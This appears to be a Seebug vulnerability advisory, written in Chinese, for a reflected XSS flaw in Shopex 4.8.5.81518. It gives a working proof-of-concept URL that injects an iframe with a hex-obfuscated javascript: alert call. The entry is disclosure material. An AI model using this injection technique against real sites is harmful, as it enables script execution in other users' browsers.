Shopex反射型XSS

2013-12-10T00:00:00
ID SSV:93577
Type seebug
Reporter Root
Modified 2013-12-10T00:00:00

Description

简要描述:

Shopex 4.8.5.81518 反射型XSS

详细说明:

http://site/shopex-single-4.8.5.81518/index.php?product-"><iframe src=javascript:window["\x61\x6c\x65\x72\x74"](0x1) -30763-viewpic.html

编码一下就能 alert(1)

漏洞证明:

<img src="https://images.seebug.org/upload/201312/1016204991e56ba772f0266ce04944c8239e649a.jpg" alt="shopex_xss.jpg" width="600" onerror="javascript:errimg(this);">